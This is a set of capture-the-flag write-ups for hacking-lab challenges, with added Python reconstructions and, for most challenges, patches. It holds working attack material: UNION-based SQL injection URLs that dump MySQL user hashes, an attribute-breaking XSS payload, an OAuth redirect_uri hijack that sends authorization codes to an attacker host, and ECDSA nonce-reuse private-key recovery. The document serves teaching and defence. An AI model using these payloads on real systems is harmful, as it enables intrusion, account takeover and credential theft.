- 5215 wordpressplugger ------------:
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1
- -> Returns the record for calendar id 1.
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2
- -> Returns nothing.
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=2-1
- -> Returns the record for id 1 again, so the parameter is evaluated as a SQL expression (no casting, no quoting).
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=1/**/ORDER/**/BY/**/14
- -> Still returns id 1, so the query selects at least 14 columns; the UNION below uses 14.
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,count(user),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
- -> Shows a 6 in the "Subject" field (column 5), so mysql.user has 6 rows:
- GET /wordpress/?cpmvc_do_action=mvparse&f=edit&id=0/**/union/**/select/**/1,2,3,4,group_concat(user,0x3a,password),6,7,8,9,10,11,12,13,14/**/from/**/mysql.user
- -> root:*09753075E6FEF0002CC255046396E59A1ED19BB1,
- <same entry>
- <same entry>
- <same entry>
- debian-sys-maint:*6ABC3CC789E7C360B292AF4FE1DF816C2C53488D,
- wpuser:*C9B2DB1CA193280B971CA3602D5174A5D637D2BF
- Patch: + $_GET["id"] = intval($_GET["id"]); (sufficient here because id is numeric; a prepared statement with a bound parameter is the general fix)
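The probing sequence above (arithmetic oracle, ORDER BY column count, UNION SELECT into the rendered column), replayed as an added example that is not the writeup's code. The vulnerable plugin query is simulated with an in-memory SQLite table; the 14-column layout, the row contents and the user table are constructed for the demo, and because SQLite replaces MySQL the concatenation uses `||` instead of `0x3a`. The hardened lookup is the writeup's intval() patch generalised to a bound parameter.

```python
"""Added example: ORDER BY / UNION SELECT workflow against a constructed SQLite stand-in
for the vulnerable plugin query (not the writeup's code)."""
import sqlite3

NCOLS = 14          # the plugin's SELECT returns 14 columns (ORDER BY 14 succeeds)
SUBJECT_SLOT = 5    # the 5th column is rendered as the "Subject" field


def build_db():
    """Constructed stand-in for the plugin's calendar table plus a user table to exfiltrate."""
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, NCOLS + 1))
    conn.execute(f"CREATE TABLE calendar (id INTEGER, {cols})")
    row = [1] + [f"field{i}" for i in range(2, NCOLS + 1)]
    conn.execute(f"INSERT INTO calendar VALUES ({','.join('?' * NCOLS)})", row)
    conn.execute("CREATE TABLE user (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("root", "*0975"), ("wpuser", "*C9B2")])  # constructed, truncated hashes
    return conn


def vulnerable_lookup(conn, raw_id):
    """The bug: the id parameter is pasted into the statement without casting or quoting."""
    sql = f"SELECT * FROM calendar WHERE id = {raw_id}"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None            # an error page looks like "no result" to the attacker


def fixed_lookup(conn, raw_id):
    """The writeup's patch, generalised: cast to int and bind the value."""
    try:
        value = int(raw_id)
    except ValueError:
        return None
    return conn.execute("SELECT * FROM calendar WHERE id = ?", (value,)).fetchone()


def is_injectable(lookup):
    """The writeup's oracle: id=2-1 returning the id=1 row shows the value is evaluated as SQL."""
    return lookup("2") is None and lookup("2-1") is not None and lookup("2-1") == lookup("1")


def find_column_count(lookup, base_id=1, max_cols=64):
    """ORDER BY n keeps working until n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        if lookup(f"{base_id}/**/ORDER/**/BY/**/{n}") is None:
            return n - 1
    return None


def union_extract(lookup, ncols, expression, table, slot=SUBJECT_SLOT):
    """Put `expression` into the column that the page renders and read it back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expression
    payload = "0/**/UNION/**/SELECT/**/" + ",".join(cols) + f"/**/FROM/**/{table}"
    row = lookup(payload)
    return None if row is None else row[slot - 1]


def dump_users(lookup, ncols):
    """count(user) first, then group_concat(user:password), as in the writeup."""
    count = union_extract(lookup, ncols, "count(user)", "user")
    joined = union_extract(lookup, ncols, "group_concat(user||':'||password)", "user")
    return count, sorted(joined.split(","))


if __name__ == "__main__":
    db = build_db()
    vuln = lambda raw: vulnerable_lookup(db, raw)
    print("injectable:", is_injectable(vuln))
    ncols = find_column_count(vuln)
    print("columns:", ncols)
    print("users:", dump_users(vuln, ncols))
    print("patched, id=2-1:", fixed_lookup(db, "2-1"))
```

The `/**/` comments stand in for spaces exactly as in the writeup's URLs; both MySQL and SQLite treat them as whitespace, which is why the trick survives naive space filtering.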
- 5212 Hello my name is ------------:
- http://348bc741d2dc.i.hacking-lab.com/card.php?name=Yolo&size=467" onload="eval(document.location.hash.slice(1))">#alert(1337)
- -> size is echoed unescaped inside a tag attribute: the quote closes the attribute, onload adds a handler that evaluates the URL fragment, and the trailing "> re-closes the tag. The fragment (#alert(1337)) is never sent to the server, so the actual payload does not appear in server logs.
- Patch: $size = htmlspecialchars($_GET['size'], ENT_QUOTES);
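An added example, not the challenge's card.php (whose markup the writeup does not show): a reconstruction of the attribute-context injection beside the escaped version. The `<img>` template is an assumption; `html.escape(quote=True)` plays the role of `htmlspecialchars(..., ENT_QUOTES)`, and the stdlib HTML parser is used to show what a browser would make of each output.

```python
"""Added example: attribute-context XSS, vulnerable template beside the escaped one
(hypothetical reconstruction, not the challenge's code)."""
import html
from html.parser import HTMLParser

# The size value from the writeup: closes the attribute, adds an onload handler that
# evaluates the URL fragment, and re-closes the tag with the server's own quote.
PAYLOAD = '467" onload="eval(document.location.hash.slice(1))">'


def render_card_vulnerable(name, size):
    """Hypothetical template that interpolates the parameters unescaped."""
    return f'<img src="/card.png" alt="{name}" width="{size}">'


def render_card_fixed(name, size):
    """Same template with html.escape(quote=True), the equivalent of ENT_QUOTES."""
    return (f'<img src="/card.png" alt="{html.escape(name, quote=True)}" '
            f'width="{html.escape(size, quote=True)}">')


class _TagCollector(HTMLParser):
    """Collects (tag, attributes) for every start tag, the way a browser would see them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def has_event_handler(markup):
    """True if any parsed attribute is an on* handler, i.e. the input escaped its context."""
    return any(k.lower().startswith("on") for _, attrs in parsed_tags(markup) for k in attrs)


if __name__ == "__main__":
    for render in (render_card_vulnerable, render_card_fixed):
        out = render("Yolo", PAYLOAD)
        print(render.__name__, "->", parsed_tags(out), "handler:", has_event_handler(out))
```

In the escaped output the whole payload survives as the literal value of `width`, which is the point: escaping does not strip the input, it keeps it from changing the parse.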
- 7550 Princess in Distress ------------:
- #!/usr/bin/perl
- # Whitespace steganography in input.html: a single whitespace character between
- # two runs of text encodes a 0 bit, two consecutive whitespace characters a 1 bit.
- use strict;
- use warnings;
- open my $fh, '<', 'input.html' or die "input.html: $!";
- my $content = do { local $/; <$fh> };
- close $fh;
- $content =~ s/\s/|/g;        # every whitespace character becomes '|'
- $content =~ s/[^|]+/ /g;     # every run of non-whitespace becomes one separator
- my $binary = '';
- for (split / /, $content) {  # tokens are now '|' (0) or '||' (1)
-     $binary .= '0' if $_ eq '|';
-     $binary .= '1' if $_ eq '||';
- }
- print pack 'B*', $binary;    # eight bits per byte, MSB first
- Output: What is a man? A miserable little pile of secrets: \x89PNG^M...
- $ file output
- output: PNG image data, 320 x 224, 8-bit/color RGB, non-interlaced
- #!/usr/bin/perl
- # The first seven pixel rows of the extracted PNG carry one bit per pixel in the
- # red channel: dark (red below 80) is a 1, bright is a 0.
- use strict;
- use warnings;
- use GD;
- my $img = GD::Image->new('output.png') or die "cannot read output.png";
- my $binary = '';
- for my $y (0 .. 6) {
-     for my $x (0 .. 319) {
-         my ($r, $g, $b) = $img->rgb($img->getPixel($x, $y));
-         $binary .= $r > 80 ? '0' : '1';
-     }
- }
- print pack 'B*', $binary;
- Output:
- This is not the file you're looking for... *jedi gesture*
- If you look carefuly, sometimes a file can hide another..
- By the way, should you stumble upon a locked chest during
- your quest, this key will have it opened, once unciphered
- with the magic number of 1337:
- BQRAIHUJBVWSF
- Gronsfeld cipher (a Vigenère with a numeric key): decrypting "BQRAIHUJBVWSF" with key "1337" gives "ANOTHERCASTLE".
- $ binwalk output
- DECIMAL HEXADECIMAL DESCRIPTION
- --------------------------------------------------------------------------------
- 51 0x33 PNG image, 320 x 224, 8-bit/color RGB, non-interlaced
- 92 0x5C Zlib compressed data, default compression, uncompressed size >= 215264
- 3450 0xD7A PNG image, 256 x 224, 8-bit/color RGB, non-interlaced
- 3491 0xDA3 Zlib compressed data, default compression, uncompressed size >= 172256
- $ 7z e out.zip -y -pANOTHERCASTLE
- $ file mario.xm
- mario.xm: Fasttracker II module sound data Title: "super mario brothers\032FastTracker v2.00 \004\001\024\001"
- $ strings mario.xm
- ...
- IFOUNDTHEPRINCESS
- greenbass:mel-o-d/hbe
- I hope you had fun!
- ------------- Tenchi
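The whitespace decoder and the Gronsfeld step of this challenge in Python, as an added example that is not the writeup's Perl. The encoder exists only so the round trip can be checked offline; the cover text it uses is constructed, and the assumption that one whitespace character means 0 and two mean 1 is what the Perl regexes above recover. The Gronsfeld values are the ones quoted in the writeup.

```python
"""Added example: whitespace steganography round trip and Gronsfeld decryption
(not the writeup's code; cover text constructed)."""
import re


def whitespace_encode(message, cover_words):
    """Hide message bits between words: one space = 0, two spaces = 1 (assumed scheme)."""
    bits = "".join(f"{b:08b}" for b in message.encode())
    if len(bits) > len(cover_words) - 1:
        raise ValueError("cover text too short")
    words = cover_words[: len(bits) + 1]
    parts = [words[0]]
    for bit, word in zip(bits, words[1:]):
        parts.append(" " if bit == "0" else "  ")
        parts.append(word)
    return "".join(parts)


def whitespace_decode(text):
    """Mirror of the Perl: whitespace -> '|', everything else -> separator, '|'=0, '||'=1."""
    marked = re.sub(r"\s", "|", text)
    marked = re.sub(r"[^|]+", " ", marked)
    bits = "".join("0" if tok == "|" else "1"
                   for tok in marked.split(" ") if tok in ("|", "||"))
    bits = bits[: len(bits) - len(bits) % 8]          # drop a trailing partial byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def gronsfeld(text, key, decrypt=False):
    """Vigenere with a numeric key: each letter shifts by the next key digit."""
    digits = [int(c) for c in key]
    out, j = [], 0
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        base = ord("A") if ch.isupper() else ord("a")
        shift = digits[j % len(digits)]
        if decrypt:
            shift = -shift
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        j += 1
    return "".join(out)


if __name__ == "__main__":
    cover = ["w%d" % i for i in range(200)]                   # constructed cover text
    stego = whitespace_encode("ANOTHER", cover)
    print(whitespace_decode(stego))                            # b'ANOTHER'
    print(gronsfeld("BQRAIHUJBVWSF", "1337", decrypt=True))    # ANOTHERCASTLE
```

Real carriers (HTML, source code) contain incidental whitespace runs, so in practice the decoder is pointed at the region where the run pattern is regular rather than the whole file.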
- 7554 Binary Tricks ------------:
- $ ltrace ./houdini.bin
- __libc_start_main(0x40078a, 1, 0x7fff42d88e28, 0x400930 <unfinished ...>
- getenv("ADMIN")
- atoi(0x7fff42d89fd6, 0x7fff42d88cf2, 3, 2)
- setenv("ADMIN", "-1", 1)
- printf("What did you expect?")
- ...
- 0x00000000004006fe <+142>: movzbl 0x200713(%rip),%eax # 0x600e18 == 'A'
- 0x0000000000400705 <+149>: mov %al,-0x10(%rbp)
- 0x0000000000400708 <+152>: movzbl 0x200703(%rip),%eax # 0x600e12 == 'D'
- 0x000000000040070f <+159>: mov %al,-0xf(%rbp)
- 0x0000000000400712 <+162>: movzbl 0x2006fb(%rip),%eax # 0x600e14 == 'M'
- 0x0000000000400719 <+169>: mov %al,-0xe(%rbp)
- 0x000000000040071c <+172>: movzbl 0x2006f3(%rip),%eax # 0x600e16 == 'I'
- 0x0000000000400723 <+179>: mov %al,-0xd(%rbp)
- 0x0000000000400726 <+182>: movzbl 0x2006e3(%rip),%eax # 0x600e10 == 'N'
- 0x000000000040072d <+189>: mov %al,-0xc(%rbp)
- 0x0000000000400730 <+192>: movb $0x0,-0xb(%rbp)
- 0x0000000000400734 <+196>: lea -0x10(%rbp),%rax
- 0x0000000000400738 <+200>: mov %rax,%rdi
- 0x000000000040073b <+203>: callq 0x400560 <getenv@plt>
- 0x0000000000400740 <+208>: mov %rax,-0x8(%rbp)
- 0x0000000000400744 <+212>: cmpq $0x0,-0x8(%rbp)
- 0x0000000000400749 <+217>: je 0x400768 <register_tm_clones+248>
- 0x000000000040074b <+219>: mov -0x8(%rbp),%rax
- 0x000000000040074f <+223>: mov %rax,%rdi
- 0x0000000000400752 <+226>: callq 0x4005f0 <atoi@plt>
- 0x0000000000400757 <+231>: cmp $0x7ffffffa,%eax # atoi(getenv("ADMIN")) == 2147483642
- So the program assembles the name "ADMIN" byte by byte on the stack from non-adjacent addresses (0x600e18, 0x600e12, 0x600e14, ...), which keeps it out of strings(1), calls getenv() on it and compares atoi() of the value against 0x7ffffffa = 2147483642; ltrace shows that it afterwards overwrites the variable with -1 before printing the taunt. The value must fit a signed 32-bit int exactly, so:
- hacker@096e684245c3:/opt/houdini$ ADMIN=2147483642 ./houdini.bin
- The flag is : {simsalabim /usr/bin !}
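A small helper for the pattern above, added here and not part of the writeup's tooling: recover a stack-built string and the comparison immediate from a gdb listing. It relies on the `# 0x... == 'X'` annotations the writeup added to the listing instead of resolving the RIP-relative loads from the ELF, which is what keeps it self-contained; the listing it parses is the one printed above.

```python
"""Added example: recover a byte-by-byte stack string and the cmp immediate from an
annotated gdb listing (the listing is the writeup's, the tool is not)."""
import re

# Constructed input: the relevant lines of the listing above, verbatim.
LISTING = """
0x00000000004006fe <+142>: movzbl 0x200713(%rip),%eax # 0x600e18 == 'A'
0x0000000000400705 <+149>: mov %al,-0x10(%rbp)
0x0000000000400708 <+152>: movzbl 0x200703(%rip),%eax # 0x600e12 == 'D'
0x000000000040070f <+159>: mov %al,-0xf(%rbp)
0x0000000000400712 <+162>: movzbl 0x2006fb(%rip),%eax # 0x600e14 == 'M'
0x0000000000400719 <+169>: mov %al,-0xe(%rbp)
0x000000000040071c <+172>: movzbl 0x2006f3(%rip),%eax # 0x600e16 == 'I'
0x0000000000400723 <+179>: mov %al,-0xd(%rbp)
0x0000000000400726 <+182>: movzbl 0x2006e3(%rip),%eax # 0x600e10 == 'N'
0x000000000040072d <+189>: mov %al,-0xc(%rbp)
0x0000000000400730 <+192>: movb $0x0,-0xb(%rbp)
0x0000000000400734 <+196>: lea -0x10(%rbp),%rax
0x000000000040073b <+203>: callq 0x400560 <getenv@plt>
0x0000000000400744 <+212>: cmpq $0x0,-0x8(%rbp)
0x0000000000400752 <+226>: callq 0x4005f0 <atoi@plt>
0x0000000000400757 <+231>: cmp $0x7ffffffa,%eax # atoi(getenv("ADMIN")) == 2147483642
"""

LOAD_RE = re.compile(r"movzbl\s+0x[0-9a-f]+\(%rip\),%eax\s+#\s+0x[0-9a-f]+\s+==\s+'(.)'")
STORE_RE = re.compile(r"mov\s+%al,-0x([0-9a-f]+)\(%rbp\)")
CMP_RE = re.compile(r"cmp\s+\$0x([0-9a-f]+),%eax")


def recover_stack_string(listing):
    """Pair each annotated byte load with the following store to -0xNN(%rbp); the
    string reads from the lowest address (largest negative offset) upwards."""
    pending, cells = None, {}
    for line in listing.splitlines():
        m = LOAD_RE.search(line)
        if m:
            pending = m.group(1)
            continue
        m = STORE_RE.search(line)
        if m and pending is not None:
            cells[int(m.group(1), 16)] = pending
            pending = None
    return "".join(cells[off] for off in sorted(cells, reverse=True))


def recover_compare_constant(listing):
    """The immediate compared against atoi()'s result, interpreted as signed 32-bit."""
    m = CMP_RE.search(listing)
    if m is None:
        return None
    value = int(m.group(1), 16)
    return value - (1 << 32) if value >= (1 << 31) else value


def suggested_invocation(listing, binary="./houdini.bin"):
    """Environment assignment that makes atoi(getenv(NAME)) equal the constant."""
    return f"{recover_stack_string(listing)}={recover_compare_constant(listing)} {binary}"


if __name__ == "__main__":
    print(suggested_invocation(LISTING))
```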
- 4300 OAuth2 ------------:
- redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
- -> OK
- redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizex
- -> OAuth error
- redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorizedd
- -> OK
- redirect_uri=httphttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized
- -> OK
- -> So the IdP only checks that the registered callback occurs somewhere inside redirect_uri (a substring match), not that the two are equal; any URL that embeds the registered one is accepted.
- First capture the initial redirect (the link to the IdP's authorize endpoint) but do not follow it:
- http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
- The redirect_uri parameter is then modified so that it points at a host we control while still containing the registered callback:
- http://509876f5a784.i.hacking-lab.com:777/idp/oauth/authorize?response_type=code&client_id=VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF&redirect_uri=http%3a%2F%2Fmeine.domain.xxx%2f%3fxxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%253A%252F%252F509876f5a784.i.hacking-lab.com%252Fapp1%252F&scope=email&state=lYWUgQVsI5kiUkbLMTXY
- On meine.domain.xxx we then see the following request arrive, carrying the authorization code:
- GET /?xxx=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2Fauthorized%3Fnext%3Dhttp%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg HTTP/1.1
- ...
- User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.10.0-327.13.1.el7.x86_64
- code: h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
- Replaying the stolen code at the legitimate callback:
- http://509876f5a784.i.hacking-lab.com/app1/authorized?next=http%3A%2F%2F509876f5a784.i.hacking-lab.com%2Fapp1%2F&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg
- Signed in as admin
- Gold nugget: k2PCyLoOXw-SWNbqsY4KUQNAtbBQVHqjOXcFGj8G
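The redirect_uri check that the probes imply, beside an exact-match check, plus the hijack URI assembled the way the writeup does it. This is an added example and not the IdP's code: the substring validator is inferred from the four probe results above, the registered callback and state value are the writeup's, and `meine.domain.xxx` is the writeup's placeholder for the attacker host.

```python
"""Added example: weak (substring) vs strict redirect_uri validation and the
code-stealing redirect from the writeup (validator logic inferred, not the IdP's code)."""
from urllib.parse import urlsplit, parse_qs, urlencode, quote

REGISTERED = "http://509876f5a784.i.hacking-lab.com/app1/authorized"


def weak_redirect_ok(registered, candidate):
    """Substring match: accepts 'authorizedd', 'httphttp://...' and anything that embeds
    the registered URL, which is the behaviour the probes above show."""
    return registered in candidate


def strict_redirect_ok(registered, candidate):
    """Exact comparison against the pre-registered value (RFC 6749 section 3.1.2.3
    calls for simple string comparison); rejects every probe except the real one."""
    return candidate == registered


def build_hijack_redirect(registered_with_next, attacker_origin="http://meine.domain.xxx/"):
    """The decoded redirect_uri the IdP inspects: the legitimate callback (with its own,
    already-encoded next= parameter) appended raw as a query parameter of the attacker's
    URL, so the substring check still matches."""
    return f"{attacker_origin}?xxx={registered_with_next}"


def authorize_url(idp, client_id, redirect_uri, state):
    """The /authorize request; redirect_uri is percent-encoded once here, which the IdP undoes."""
    params = {"response_type": "code", "client_id": client_id,
              "redirect_uri": redirect_uri, "scope": "email", "state": state}
    return f"{idp}/idp/oauth/authorize?{urlencode(params)}"


def code_from_callback(url):
    """Pull the authorization code the IdP appends when it redirects the victim to us."""
    return parse_qs(urlsplit(url).query).get("code", [None])[0]


def replay_url(registered_with_next, state, code):
    """The final step of the writeup: present the stolen code at the real callback."""
    sep = "&" if "?" in registered_with_next else "?"
    return f"{registered_with_next}{sep}{urlencode({'state': state, 'code': code})}"


if __name__ == "__main__":
    probes = [REGISTERED, REGISTERED[:-1] + "x", REGISTERED + "d", "http" + REGISTERED]
    for p in probes:
        print(f"{p[-14:]:>14} weak={weak_redirect_ok(REGISTERED, p)} "
              f"strict={strict_redirect_ok(REGISTERED, p)}")
    legit = REGISTERED + "?next=" + quote("http://509876f5a784.i.hacking-lab.com/app1/", safe="")
    hijack = build_hijack_redirect(legit)
    print(authorize_url("http://509876f5a784.i.hacking-lab.com:777",
                        "VCWhuqHOGBEF1B5dWxK8xztgV8iLidLRS4kBd1sF", hijack, "lYWUgQVsI5kiUkbLMTXY"))
    # Constructed: what lands on the attacker host after the victim consents.
    landed = hijack + "&state=lYWUgQVsI5kiUkbLMTXY&code=h1BCbMj3gxZoVkTYYWv5Lpg1tVm2hg"
    print(replay_url(legit, "lYWUgQVsI5kiUkbLMTXY", code_from_callback(landed)))
```

The state parameter does not help the victim here: the attacker replays the very state/code pair the IdP issued, so only exact matching of redirect_uri (or PKCE bound to the attacker-unknown verifier) closes the hole.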
- 7686 Breaking Elliptic Curve Cryptography ------------:
- #!/usr/bin/perl
- use Crypt::PK::ECC;
- use Data::Dumper;
- my $priv = Crypt::PK::ECC->new('private_key.pem');
- print Dumper($priv->key2hash);
- Output:
- $VAR1 = {
- 'size' => 24,
- 'curve_bytes' => 24,
- 'curve_name' => 'SECP192R1',
- 'curve_Gx' => '188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012',
- 'curve_B' => '64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1',
- 'curve_order' => 'FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831',
- 'curve_bits' => 192,
- 'k' => 'AC8577FF2504492E7CB6D5F8716D4C193728D8592B6F4225',
- 'curve_prime' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF',
- 'curve_A' => 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC',
- 'pub_x' => '1D590766F26A888B8C6C38E8A0ABDA1609B40955D1996620',
- 'curve_Gy' => '07192B95FFC8DA78631011ED6B24CDD573F977A11E794811',
- 'curve_cofactor' => 1,
- 'type' => 1,
- 'pub_y' => '8BD11F87E8F87AE0607F58BF68327DF2E5186D7D97F2C3F7'
- };
- A standard NIST P-192 curve. The Wireshark dump shows two signatures with identical r, i.e. the same nonce k was used twice:
- sig = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvc1ilypdV4aDLRLIlVaCCkHsuN6EAet0 und sig2 = BRXVEpTGwCo1HsaTNmhJ5NynvUsdhFzvSvNuLoc421+3BZMMFukNTOztlpj9kf4e
- Split into (r, s) these are (note the equal r):
- (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e) und
- (0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef, 4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e)
- #!/usr/bin/python3
- # ECDSA nonce reuse: with equal r, k = (m1 - m2) / (s1 - s2) mod n, and the
- # private key follows from s1 = k^-1 (m1 + r d) mod n.
- from hashlib import sha1
- from ecdsa import numbertheory
- m1 = int(sha1(b"iSsuZJOq1FNKMuK4wm88UEkr21wgsypW").hexdigest(), 16)
- m2 = int(sha1(b"x3wqOnaetBPO66TrBaMyr3NQIDbhvK0w").hexdigest(), 16)
- r1 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
- s1 = int("7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e", 16)
- r2 = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
- s2 = int("4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e", 16)
- n = int("FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831", 16)
- assert r1 == r2, "no nonce reuse, the attack does not apply"
- _k = (m1 - m2) * numbertheory.inverse_mod(s1 - s2, n) % n
- _d = (s1 * _k - m1) * numbertheory.inverse_mod(r1, n) % n
- print(hex(_d))
- Output: 0x2f3c25b19905c1c0c5a75507064b94289c0b7064b16e2c31
- #!/usr/bin/python3
- # Sign the login nonce with the recovered key; python-ecdsa hashes with SHA-1 by
- # default and emits r || s (48 bytes), the encoding the captured signatures use.
- import base64
- from ecdsa import SigningKey, NIST192p
- d = 0x2f3c25b19905c1c0c5a75507064b94289c0b7064b16e2c31
- sk_new = SigningKey.from_string(d.to_bytes(24, "big"), curve=NIST192p)
- message = b"gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4"
- sig = sk_new.sign(message)   # fresh random k, so the base64 differs per run
- print(base64.b64encode(sig).decode())
- Output (one run):
- YKQBPvMtErS5rHvGKe1jXmETsKwFMWgnif0MxwwEnestC4+77wgS3H2RAbHf6Utd
- Logging in with this signature for the nonce "gDNv45g1l0pC9ytqsuL3fURuvL7OFJc4" yields the secret:
- #This class will make everyone our slaves!
- import evillib
- class EvilAlgorithm:
- def bad_function(self):
- evillib.evilyfy()
- print('Obey slaves!')
- evilness = "sooo evil!"
- return evilness
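The recovery above in plain Python, as an added example that is not the writeup's scripts: ECDSA over the writeup's curve (P-192) with signing, verification and the two-signature key recovery, so that the recovered key is checked by verifying a signature rather than trusted. The curve constants, message strings and (r, s) values are the ones quoted above; the private key and nonce used for the self-test are constructed. `recover_from_writeup()` runs the writeup's own numbers, for which the notes report d = 0x2f3c25b1...2c31.

```python
"""Added example: textbook ECDSA on P-192 plus nonce-reuse key recovery
(not the writeup's code; demo key and nonce are constructed)."""
from hashlib import sha1

# NIST P-192 parameters, as dumped from the key above
P = int("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF", 16)
A = int("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC", 16)
N = int("FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831", 16)
G = (int("188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012", 16),
     int("07192B95FFC8DA78631011ED6B24CDD573F977A11E794811", 16))


def ec_add(p1, p2):
    """Affine point addition on y^2 = x^3 + Ax + B over GF(P); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def ec_mul(k, point):
    """Double-and-add scalar multiplication."""
    result = None
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def hash_int(message):
    """SHA-1 of the message as an integer (160 bits, fits the 192-bit group order)."""
    return int(sha1(message).hexdigest(), 16)


def sign(d, message, k):
    """Textbook ECDSA with an explicit nonce k; reusing k across messages is the bug."""
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (hash_int(message) + r * d) % N
    return r, s


def verify(pub, message, sig):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    h = hash_int(message)
    point = ec_add(ec_mul(h * w % N, G), ec_mul(r * w % N, pub))
    return point is not None and point[0] % N == r


def recover_private_key(h1, s1, h2, s2, r):
    """From two signatures with equal r: k = (h1 - h2)/(s1 - s2), d = (s1 k - h1)/r (mod N)."""
    k = (h1 - h2) * pow((s1 - s2) % N, -1, N) % N
    d = (s1 * k - h1) * pow(r, -1, N) % N
    return k, d


def recover_from_writeup():
    """The values captured in the writeup above."""
    h1 = hash_int(b"iSsuZJOq1FNKMuK4wm88UEkr21wgsypW")
    h2 = hash_int(b"x3wqOnaetBPO66TrBaMyr3NQIDbhvK0w")
    r = int("0515d51294c6c02a351ec693366849e4dca7bd4b1d845cef", 16)
    s1 = int("7358a5ca9755e1a0cb44b22555a082907b2e37a1007add3e", 16)
    s2 = int("4af36e2e8738db5fb705930c16e90d4ceced9698fd91fe1e", 16)
    return recover_private_key(h1, s1, h2, s2, r)


def nonce_reuse_demo(d, k, m1, m2):
    """Sign m1 and m2 with the same k, then recover (k, d) from the two signatures alone."""
    r1, s1 = sign(d, m1, k)
    r2, s2 = sign(d, m2, k)
    assert r1 == r2           # the tell-tale sign of a repeated nonce
    return recover_private_key(hash_int(m1), s1, hash_int(m2), s2, r1)


if __name__ == "__main__":
    d_demo = int("2f3c25b19905c1c0c5a75507064b94289c0b7064b16e2c31", 16)   # constructed key
    k_demo = 0x1234567890ABCDEF1234567890ABCDEF12345678                   # constructed nonce
    print(nonce_reuse_demo(d_demo, k_demo, b"first message", b"second message"))
    print([hex(v) for v in recover_from_writeup()])
```

Deterministic nonces (RFC 6979) remove this failure mode entirely; a signer that draws k from a weak or repeated source leaks its key after two signatures, as the dump above shows.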
- 5219 Rohde & Schwarz Cybersecurity-Challenge ------------:
- $ file hackme.beam
- hackme.beam: Erlang BEAM file
- $ erl
- Erlang/OTP 17 [erts-6.2] [source] [64-bit] [smp:4:4] [async-threads:10] [kernel-poll:false]
- Eshell V6.2 (abort with ^G)
